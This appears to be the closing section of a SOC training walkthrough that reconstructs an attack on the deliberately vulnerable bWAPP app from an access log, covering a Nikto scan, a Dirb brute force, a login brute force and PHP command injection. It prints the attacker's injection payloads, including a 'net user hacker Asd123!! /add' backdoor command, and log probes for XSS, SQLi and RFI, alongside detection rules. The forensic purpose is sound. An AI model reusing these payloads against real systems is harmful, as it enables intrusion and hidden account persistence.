PHASE 9 — FINAL VERIFICATION AND CLOSURE
Confirm all attacker traffic is accounted for before closing the investigation
STEP 25 — Verify total traffic attribution
Why: Before declaring an investigation complete, a SOC analyst must confirm that every request from the attacker IP has been categorised into a known phase. Unaccounted traffic is a red flag — it may represent an additional attack vector, a tool phase you missed, or a second attacker entirely. The investigation cannot be closed until the arithmetic balances to zero remainder.
The correct method for this log:
The three confirmed tool phases were identified by their User-Agent strings. The cleanest way to surface unaccounted traffic is therefore to subtract those three populations from the total using chained grep -v (invert match) commands. This approach searches the entire raw line — not just a parsed field — which means it is immune to the field-misalignment problem that affects awk -F'"' on structurally malformed lines.
# Step 1 — Establish the total attacker request count
grep "192.168.199.2" access.log | wc -l
# Step 2 — Count each confirmed phase
grep "Nikto" attacker_traffic.log | wc -l
grep "MSIE 6.0" attacker_traffic.log | wc -l
grep "Firefox/52.0" attacker_traffic.log | wc -l
# Step 3 — Isolate exactly what remains: lines that match NONE of the three known tools
grep -v "Nikto" attacker_traffic.log \
| grep -v "MSIE 6.0" \
| grep -v "Firefox/52.0" \
| wc -l
# Step 4 — Identify the User-Agents of the remaining lines
grep -v "Nikto" attacker_traffic.log \
| grep -v "MSIE 6.0" \
| grep -v "Firefox/52.0" \
| awk -F'"' '{print $6}' | sort | uniq -c | sort -rn
# Step 5 — Inspect all 83 raw lines to confirm their content and phase
grep -v "Nikto" attacker_traffic.log \
| grep -v "MSIE 6.0" \
| grep -v "Firefox/52.0"
# Step 6 — Confirm the investigation closes cleanly at the last known event
grep "192.168.199.2" access.log | tail -5
This log — confirmed terminal results:
Step 1 — Total:
12528
Step 2 — Phase counts:
7455 Nikto
4816 MSIE 6.0
174 Firefox/52.0
Step 3 — Unaccounted count:
83
Step 4 — User-Agent breakdown of the 83 lines:
74 - (null UA — no User-Agent header sent at all)
5 ./.\\\ (Nikto path traversal evasion — UA set to a traversal string)
4 (empty string UA — blank UA header sent)
--
83 total ✓
Step 5 — Raw line content of the 83 (representative sample):
12:36:24 GET /bwapp/4RaXX5Ac.xml 400 (Nikto extension probe)
12:36:33 GET /bwapp/site/' UNION 400 (SQL injection test)
12:36:33 GET /bwapp/postnuke/...XSS payload... 400 (XSS injection test)
12:36:34 GET /bwapp/index.php?action=search&...XSS... 400 (XSS injection test)
12:36:34 GET /bwapp/cgi-bin/handler/...cat /etc/passwd 400 (OS command injection test)
12:36:39 GET /bwapp/forum.asp?n=../../boot.ini|...SQL... 400 (Path traversal + SQLi test)
12:36:46 GET /bwapp/...?mfh_root_path=http://cirt.net/.. 400 (RFI probe)
12:36:54 <script>alert(1)</script> /bwapp/ HTTP/1.1 400 (XSS injected into method field)
12:36:56 GET /bwapp/MediaServerDevDesc.xml 400 (Service discovery probe)
(... 74 additional lines, all within the 12:36:24–12:36:57 Phase 1 window)
Step 6 — Final 5 lines in the log:
12:52:36 GET /bWAPP/phpi.php?message=...whoami... 200 Firefox/52.0
12:52:46 GET /bWAPP/phpi.php?message=...net user... 200 Firefox/52.0
12:52:56 GET /bWAPP/phpi.php?message=...net share... 200 Firefox/52.0
12:53:13 GET /bWAPP/phpi.php?message=...hacker.../add 200 Firefox/52.0
12:53:23 GET /bWAPP/phpi.php?message=...hacker.../add 200 Firefox/52.0
Analysis of the 83 unaccounted lines:
All 83 lines fall within the Phase 1 time window (12:36:24 → 12:36:57) and contain Nikto’s characteristic probe patterns — random extension strings, cirt.net/rfiinc.txt RFI payloads, path traversal sequences, XSS test strings, and SQL injection fragments. They are Nikto Phase 1 requests where Nikto deliberately suppressed or replaced its standard User-Agent header as part of its built-in evasion test battery.
Why grep "Nikto" missed them: Nikto’s evasion tests intentionally omit or replace the Nikto string from the User-Agent for those specific requests. Because our Phase 1 count (grep "Nikto" | wc -l) only matches lines containing the literal string “Nikto”, these 83 evasion-mode lines were correctly excluded from that count. They are not missing — they were deliberately held out of the Phase 1 UA bucket so the unaccounted step would surface them explicitly.
Why awk -F'"' works correctly on these 83 lines: The structurally malformed lines identified in Step 2B all contain the Nikto attack payload text and therefore all contain the string “Nikto” — they are filtered out by grep -v "Nikto" before awk -F'"' ever sees them. The 83 lines that reach awk are all well-formed log entries (all returned 400 326), so the quote-delimited field extraction produces clean, accurate results: 74 -, 5 ./.\\\, 4 (empty).
UA breakdown explained:
| User-Agent | Count | What it means |
|---|---|---|
| - (null) | 74 | Nikto sent these requests with no UA header at all — the server logs a literal - in the UA position. Nikto uses this to test whether the target blocks scanner UAs. |
| ./.\\\ (traversal string) | 5 | Nikto set its UA to a path traversal string (./.\\\) to test whether the server or WAF treats the UA field as an injection point. |
| (empty string) | 4 | Nikto sent a blank UA string. Functionally similar to null but technically distinct — an empty string vs an absent header. |
Final arithmetic — complete traffic reconciliation:
Phase 1 Nikto (standard UA lines) 7,455
Phase 1 Nikto (evasion UA lines) 83 ← surfaced by this step
Phase 2 Dirb 4,816
Phase 3 Firefox/52.0 (brute force) 174 (includes Phase 4 injection)
------
Total 12,528 ✓
Cross-check A: 12,445 (grep subtotal) + 83 (evasion) = 12,528 ✓
Cross-check B: 7,455 + 83 + 4,816 + 174 = 12,528 ✓
All 12,528 attacker requests are fully attributed. The unaccounted remainder is zero. The last five entries in the log are the final Phase 4 injection payloads — the investigation closes at the exact moment the attacker executed their persistence command for the second time at 12:53:23. No post-persistence activity, no cleanup, no additional phases. Investigation is complete.
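The same reconciliation can be sketched in Python as a first-match bucketing pass, which guarantees that every line lands in exactly one bucket and that the buckets sum to the total. This is an illustration under assumptions: reconcile and MARKERS are hypothetical names, and the four sample lines are abbreviated, made-up stand-ins for real log entries that re-use the User-Agent strings from this investigation.

```python
from collections import Counter

# (bucket label, substring searched anywhere in the raw line), checked in order.
MARKERS = [
    ("Phase 1 Nikto", "Nikto"),
    ("Phase 2 Dirb", "MSIE 6.0"),
    ("Phase 3/4 Firefox", "Firefox/52.0"),
]


def reconcile(lines):
    """Assign each raw log line to the first matching bucket, else 'unaccounted'."""
    counts = Counter()
    for line in lines:
        for label, marker in MARKERS:
            if marker in line:
                counts[label] += 1
                break
        else:
            counts["unaccounted"] += 1
    return counts


# Abbreviated illustrative lines, not copied from the real log.
sample = [
    '"GET /x HTTP/1.1" 404 - "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:*)"',
    '"GET /y HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '"POST /bWAPP/login.php HTTP/1.1" 200 4086 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"',
    '"GET /z HTTP/1.1" 400 326 "-" "-"',
]
counts = reconcile(sample)
print(dict(counts))

# Arithmetic from the confirmed results above.
assert 7455 + 4816 + 174 + 83 == 12528
```

Unlike three independent grep counts, first-match assignment cannot double-count a line that happens to contain two markers, so a non-zero "unaccounted" bucket is always a genuine remainder.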
STEP 26 — Complete incident summary
INCIDENT SUMMARY
================
Log File: access.log
Attacker IP: 192.168.199.2
Target IP/App: 192.168.199.5 / bWAPP (buggy web application)
Total Requests: 12,528 (99.77% of all traffic in the log)
Incident Window: 20/Jun/2021 12:36:24 → 12:53:23 (16 min 59 sec)
ATTACK PHASE SEQUENCE:
Phase 1 — Web Reconnaissance [Q1: nikto]
Tool: Nikto v2.1.6
UA: Mozilla/5.00 (Nikto/2.1.6) (Evasions:None)
Timeframe: 12:36:24 → 12:36:57 (33 seconds)
Volume: 7,455 requests
Activity: Automated scan for CVEs, dangerous files, misconfigurations
Shellshock probe (CVE-2014-6271), extension enumeration
Findings: bWAPP application on /bWAPP/, login page at /bWAPP/login.php
Phase 2 — Directory Listing Discovery [Q2: directory brute force]
Technique: Directory Brute Force
Tool: Dirb
UA: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Note: UA confirmed as Dirb's known default; behavior-verified
Timeframe: 12:37:50 → 12:38:02 (~12 seconds)
Volume: 4,816 requests
Activity: Wordlist-based directory and file enumeration
Result: Predominantly 404 — mapped accessible paths
[ATTACKER GAP: 3 min 32 sec — reviewing results, selecting next tool]
Phase 3 — Third Attack [Q3: Brute force | Q4: Yes]
Technique: Brute Force (Login Credential Brute Force)
UA: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Firefox/52.0
Timeframe: 12:41:34 → 12:49:35 (~8 minutes)
Volume: 134 POST requests to /bWAPP/login.php
Failures: 132 × HTTP 200, body 4086 bytes (identical failed-login page)
Success: 2 × HTTP 302 (redirect = valid credentials found)
Breach: First successful login: 12:49:35
Result: Authenticated access to bWAPP portal confirmed at 12:50:10
Phase 4 — Fourth Attack [Q5: Code Injection | Q6: whoami]
Technique: PHP Code Injection / OS Command Injection
Endpoint: /bWAPP/phpi.php?message=
Timeframe: 12:50:15 → 12:53:23 (~3 minutes)
Volume: 8 requests to phpi.php (1 baseline, 2 test, 5 live payloads)
Payload sequence:
12:50:17 message=test (parameter probe — benign)
12:51:37 message=test (probe repeated — confirmed working)
12:52:36 system('whoami') → Q6 ANSWER (identify OS user)
12:52:46 system('net user') (enumerate local accounts)
12:52:56 system('net share') (enumerate network shares)
12:53:13 system('net user hacker Asd123!! /add') → Q7 ANSWER (PERSISTENCE)
12:53:23 system('net user hacker Asd123!! /add') (repeated for confirmation)
All payloads: HTTP 200 with varying body sizes — all executed successfully
Persistence: [Q7: Yes]
Method: Windows local user account creation via net user /add
Account: Username: hacker | Password: Asd123!!
Payload: %27net%20user%20hacker%20Asd123!!%20/add%27
Executed: 12:53:13 (confirmed again at 12:53:23)
Impact: Backdoor account survives patching, reboots, and session expiry
STEP 27 — Indicators of Compromise (IOCs)
Document these IOCs and submit them to your threat intelligence platform and detection engineering team immediately upon investigation closure.
INDICATORS OF COMPROMISE
=========================
Network IOCs:
Attacker IP: 192.168.199.2
Target IP: 192.168.199.5
Protocol: HTTP (port 80)
Incident Date: 20 Jun 2021
Tool Signatures (User-Agent IOCs):
Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:*)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) [Dirb default UA]
Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Endpoint IOCs:
/bWAPP/phpi.php [Exploited PHP Injection page]
/bWAPP/login.php [Brute-forced login page]
Payload IOCs (URL-encoded):
%22%22;%20system(%27whoami%27)
%22%22;%20system(%27net%20user%27)
%22%22;%20system(%27net%20share%27)
%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)
Host IOCs (victim system — Windows):
New local user account: hacker
Account password: Asd123!!
Creation method: net user hacker Asd123!! /add
Access vectors enabled: RDP (TCP/3389), SMB (TCP/445), local Windows auth
Recommended detections to create:
1. Alert on any User-Agent matching Nikto/2.x.x pattern
2. Alert on MSIE 6.0 UA string (IE6 is long obsolete; legitimate traffic is very unlikely)
3. Alert on >50 POST requests to the same login endpoint within 5 minutes from one IP
4. Alert on HTTP 302 following a sequence of 200s on a login endpoint
5. Alert on URL parameters containing system(, exec(, passthru(, shell_exec(
6. Alert on net%20user.*(/|%2F)add or net user.*/add in web server logs (the slash was not URL-encoded in this log)
FINAL ANSWERS — ALL 7 QUESTIONS
| # | Question | Answer |
|---|---|---|
| Q1 | Which automated scan tool did the attacker use for web reconnaissance? | nikto |
| Q2 | Which technique did the attacker use for directory listing discovery? | directory brute force |
| Q3 | What is the third attack type after directory listing discovery? | Brute force |
| Q4 | Is the third attack successful? | Yes |
| Q5 | What is the name of the fourth attack? | Code Injection |
| Q6 | What is the first payload for the fourth attack? | whoami |
| Q7 | Is there any persistency clue? If yes, what is the related payload? | Yes — %27net%20user%20hacker%20Asd123!!%20/add%27 |
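Detections 5 and 6 from the STEP 27 list can be prototyped in a few lines before they are handed to detection engineering. The following is a minimal sketch, assuming Python 3 and that the request URI has already been extracted from field 7 of the log. The function name `match_detections` and the rule labels are hypothetical, and the `message` parameter in the sample URI is an assumption about how the payload reaches phpi.php. The URI is decoded once before matching, so encoded and literal forms of the same payload hit the same pattern.

```python
import re
from urllib.parse import unquote

# Hypothetical rule labels; the patterns mirror detections 5 and 6.
PHP_EXEC = re.compile(r"\b(system|exec|passthru|shell_exec)\s*\(", re.IGNORECASE)
NET_USER_ADD = re.compile(r"net\s+user\b.*?/add", re.IGNORECASE)


def match_detections(request_uri):
    """Return the labels of the rules that fire on one request URI."""
    decoded = unquote(request_uri)  # %20 -> space, %27 -> ', %2F -> /
    hits = []
    if PHP_EXEC.search(decoded):
        hits.append("php_exec_function")
    if NET_USER_ADD.search(decoded):
        hits.append("net_user_add")
    return hits


if __name__ == "__main__":
    # Payload taken from the Payload IOCs list; the parameter name is assumed.
    sample = (
        "/bWAPP/phpi.php?message="
        "%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)"
    )
    print(match_detections(sample))
```

Matching on the decoded string keeps the rule set small, but a production rule would also need to consider double encoding and case or whitespace tricks, which this sketch does not attempt.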
COMPLETE KILL CHAIN
12:36:24 PHASE 1 ─── Web Reconnaissance (Nikto v2.1.6) [Q1: nikto]
│ 7,455 requests in 33 seconds
│ Scanned CVEs, file extensions, shellshock, misconfigurations
│ Located bWAPP application and login page structure
▼
12:37:50 PHASE 2 ─── Directory Brute Force (Dirb) [Q2: directory brute force]
│ 4,816 requests in ~12 seconds
│ Enumerated directory structure via wordlist
│ Mapped accessible paths on the target application
▼
[3 min 32 sec — attacker reviewing results, setting up next tool]
▼
12:41:34 PHASE 3 ─── Brute Force Attack (Login) [Q3: Brute force]
│ 134 POST requests to /bWAPP/login.php over ~8 minutes
│ 132 failures: HTTP 200, body 4086 bytes (identical fail page)
│ 2 successes: HTTP 302 at 12:49:35 [Q4: Yes]
│ Portal.php loaded with HTTP 200 at 12:50:10
▼
12:50:15 PHASE 4 ─── Code Injection (PHP + OS Command) [Q5: Code Injection]
│ Navigated to phpi.php (PHP Injection vulnerable page)
│ Tested parameter with benign input — confirmed injectable
│ 12:52:36 → system('whoami') [Q6: whoami]
│ 12:52:46 → system('net user')
│ 12:52:56 → system('net share')
│ 12:53:13 → system('net user hacker Asd123!! /add') [Q7: Yes]
│ 12:53:23 → system('net user hacker Asd123!! /add') (confirmed)
└── Backdoor account "hacker / Asd123!!" created on victim machine
QUICK REFERENCE — ALL COMMANDS IN SEQUENCE
# ─── PHASE 1: SCOPE ──────────────────────────────────────────────────────────
wc -l access.log
head -1 access.log | awk '{print $4, $5}'
tail -1 access.log | awk '{print $4, $5}'
# Step 2A — format verification
head -3 access.log
head -1 access.log | awk '{print NF}'
# Step 2B — log integrity check (Part A: compliance count)
grep -Ec '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log
# Step 2B — log integrity check (Part B: isolate malformed lines)
grep -Ev '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log
grep -Ev '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log | wc -l
# ─── PHASE 2: IDENTIFY ATTACKER ──────────────────────────────────────────────
awk '{print $1}' access.log | sort | uniq -c | sort -rn
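# Anchor and escape the IP so addresses such as 192.168.199.20 or 192.168.199.200 cannot match
grep '^192\.168\.199\.2 ' access.log | head -20
grep '^192\.168\.199\.2 ' access.log | tail -20
grep '^192\.168\.199\.2 ' access.log > attacker_traffic.log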
wc -l attacker_traffic.log
# ─── PHASE 3: FINGERPRINT TOOLS — Q1, Q2 ─────────────────────────────────────
# Full UA inventory — all IPs, unfiltered, verbose Nikto output expected
awk -F'"' '{print $6}' access.log | sort | uniq -c | sort -nr
# IP + UA correlation — Nikto variants collapsed, clean triage view
awk -F'"' '{split($1, a, " "); print a[1], $6}' access.log | sed 's/ (Evasions.*//' | sort | uniq -c | sort -nr
# Attacker-only UA detail (run after attacker_traffic.log is created)
awk -F'"' '{print $6}' attacker_traffic.log | sort | uniq -c | sort -rn
grep "Nikto" attacker_traffic.log | wc -l
grep "Nikto" attacker_traffic.log | head -1 | awk '{print $4}'
grep "Nikto" attacker_traffic.log | tail -1 | awk '{print $4}'
grep "MSIE 6.0" attacker_traffic.log | wc -l
grep "MSIE 6.0" attacker_traffic.log | awk '{print $7}' | head -20
grep "MSIE 6.0" attacker_traffic.log | awk '{print $9}' | sort | uniq -c | sort -rn
grep "MSIE 6.0" attacker_traffic.log | head -1 | awk '{print $4}'
grep "MSIE 6.0" attacker_traffic.log | tail -1 | awk '{print $4}'
grep "MSIE 6.0" attacker_traffic.log | awk '{print $4}' | sort | uniq -c
grep "MSIE 6.0" attacker_traffic.log | awk '{print $4, $6, $7, $9}' | head -30
# ─── PHASE 4: TIMELINE ────────────────────────────────────────────────────────
grep "Firefox/52.0" attacker_traffic.log | head -1 | awk '{print $4}'
grep "Firefox/52.0" attacker_traffic.log | tail -1 | awk '{print $4}'
# ─── PHASE 5: PROFILE PHASE 3 — Q3 ───────────────────────────────────────────
grep "Firefox/52.0" attacker_traffic.log > phase3_traffic.log
wc -l phase3_traffic.log
awk '{print $6}' phase3_traffic.log | sort | uniq -c
awk '{print $6, $7}' phase3_traffic.log | sort | uniq -c | sort -rn
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $9}' | sort | uniq -c
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $9, $10}' | sort | uniq -c
grep "POST /bWAPP/login.php" attacker_traffic.log | wc -l
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $4}' | head -15
# ─── PHASE 6: CONFIRM SUCCESS — Q4 ───────────────────────────────────────────
grep "POST /bWAPP/login.php" attacker_traffic.log | grep " 302 "
grep "POST /bWAPP/login.php" attacker_traffic.log | grep " 302 " | wc -l
grep "Firefox/52.0" attacker_traffic.log | grep -A5 'POST /bWAPP/login\.php[^"]*" 302 '
grep "Firefox/52.0" attacker_traffic.log | grep "portal.php"
# ─── PHASE 7: FOURTH ATTACK — Q5, Q6 ────────────────────────────────────────
grep "Firefox/52.0" attacker_traffic.log | awk '{print $4, $6, $7, $9}' | tail -20
grep "phpi.php" attacker_traffic.log | awk '{print $4, $7}'
grep "phpi.php" attacker_traffic.log | awk '{print $4, $9, $10}'
# Decode all payloads with full context
grep "phpi.php" attacker_traffic.log | \
awk '{print $4, $5, $9, $10, $7}' | \
python3 -c "
import sys, urllib.parse
for line in sys.stdin:
    p = line.strip().split()
    # timestamp, tz offset, status, bytes, URL-decoded request path
    print(p[0], p[1], p[2], p[3], urllib.parse.unquote(p[4]))
"
# ─── PHASE 8: PERSISTENCE — Q7 ───────────────────────────────────────────────
# PRIMARY: URL-encoded search for Windows account creation
grep "phpi.php" attacker_traffic.log | grep -i "net%20user.*add"
grep "net%20user%20hacker" attacker_traffic.log
# SECONDARY: decode everything first, then search decoded output
grep "phpi.php" attacker_traffic.log | awk '{print $7}' | python3 -c "
import sys, urllib.parse
for line in sys.stdin:
    print(urllib.parse.unquote(line.strip()))
" > decoded_payloads.log
grep -i "net user.*add\|useradd\|adduser" decoded_payloads.log
grep -i "localgroup\|sudo\|administrators" decoded_payloads.log
grep -i "echo.*php\|wget\|curl" decoded_payloads.log
grep -i "schtasks\|crontab" decoded_payloads.log
grep -i "reg add\|HKLM\|HKCU" decoded_payloads.log
# Confirm execution (HTTP 200 = processed by server)
grep "net%20user%20hacker" attacker_traffic.log | awk '{print $9, $10}'
# Decode persistence payload
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)'))
HEREDOC
# ─── PHASE 9: VERIFY & CLOSE ──────────────────────────────────────────────────
grep "Nikto" attacker_traffic.log | wc -l
grep "MSIE 6.0" attacker_traffic.log | wc -l
grep "Firefox/52.0" attacker_traffic.log | wc -l
grep -v "Nikto" attacker_traffic.log | grep -v "MSIE 6.0" | grep -v "Firefox/52.0" | wc -l
grep -v "Nikto" attacker_traffic.log \
| grep -v "MSIE 6.0" \
| grep -v "Firefox/52.0" \
| awk -F'"' '{print $6}' | sort | uniq -c | sort -rn
grep -v "Nikto" attacker_traffic.log | grep -v "MSIE 6.0" | grep -v "Firefox/52.0"
grep '^192\.168\.199\.2 ' access.log | tail -5
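The Phase 5 and Phase 6 greps above can also be run as a single pass, which is convenient when the same check has to be repeated on other logs. What follows is a rough sketch rather than the method used in this walkthrough: it assumes Python 3 and Apache Combined Log Format, and the names `LOG_LINE` and `summarize_logins` are hypothetical. The sample lines are synthetic and only shaped like entries in access.log.

```python
import re
from collections import Counter

# Combined Log Format: ip ident user [timestamp] "request" status bytes ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def summarize_logins(lines, path="/bWAPP/login.php"):
    """Tally POST status codes for one login path and note the first 302."""
    statuses = Counter()
    first_redirect = None
    for line in lines:
        m = LOG_LINE.match(line)
        # Skip malformed lines, other methods, and other endpoints.
        if not m or m["method"] != "POST" or not m["uri"].startswith(path):
            continue
        statuses[m["status"]] += 1
        if m["status"] == "302" and first_redirect is None:
            first_redirect = m["ts"]
    return statuses, first_redirect


if __name__ == "__main__":
    # Synthetic lines for illustration only; not copied from access.log.
    sample = [
        '192.168.199.2 - - [20/Jun/2021:12:41:34 +0000] '
        '"POST /bWAPP/login.php HTTP/1.1" 200 4086 "-" "Mozilla/5.0"',
        '192.168.199.2 - - [20/Jun/2021:12:49:35 +0000] '
        '"POST /bWAPP/login.php HTTP/1.1" 302 - "-" "Mozilla/5.0"',
    ]
    counts, first = summarize_logins(sample)
    print(dict(counts), first)
```

To run it against the real data, pass an open file handle instead of the list, for example `summarize_logins(open("attacker_traffic.log"))`. A long run of 200 responses followed by a 302 is the same success signal that the Phase 6 greps look for.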
